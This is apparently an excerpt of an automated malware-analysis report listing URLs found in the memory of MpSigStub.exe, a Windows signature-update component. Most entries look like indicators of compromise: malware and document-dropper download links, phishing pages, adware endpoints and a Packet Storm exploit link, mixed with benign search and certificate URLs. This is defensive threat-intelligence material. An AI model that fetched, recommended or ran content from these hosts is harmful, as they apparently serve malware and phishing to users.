Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://mrbftp.xyz
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://ms365box.com/update.1
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://msiesettings.com/check/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://muacangua.com/wp-admin/o_n/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://muqo.g
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://my.pcmaps.net/api/report?type=
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://n5wo.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://naka4al.ru/tds/go.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://nation.eromariaporno.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://ncb.com.pe/media-views/pool=67/frenchclicks/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://nfe-fazenda.tk/mml/filenet.jpg
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://nigera21.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://nixtin.us/cj/cjpilx.doc
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/com6i3re47t.de/earth
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://nownowsales.com/wp-admin/ulpbz/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://nq4k.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://ocean-v.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://oddbods.co.uk/D6yd9x/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://office-service-secs.com/blm.task
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://office.otzo.com/office.sct
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://ogrc.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://p772utd.playerskate.pw/31-3r7y89e0ecb9c6_8fo0f3f7-02-c1c_f4a_b_f-12/6/ed9678f1bc90f85b7c845b8
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://padgettconsultants.ca/tau.gif
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://pic-pic.pw
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://pilinno.info/cpi/promo.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://pl2.txt.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://pomphrett.co.uk/c7fb/install/language/verouiller.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://poppy97.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://privateinvestigatorkendall.com/fo9cwuvlqwua
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://psget.net/GetPsGet.ps1x
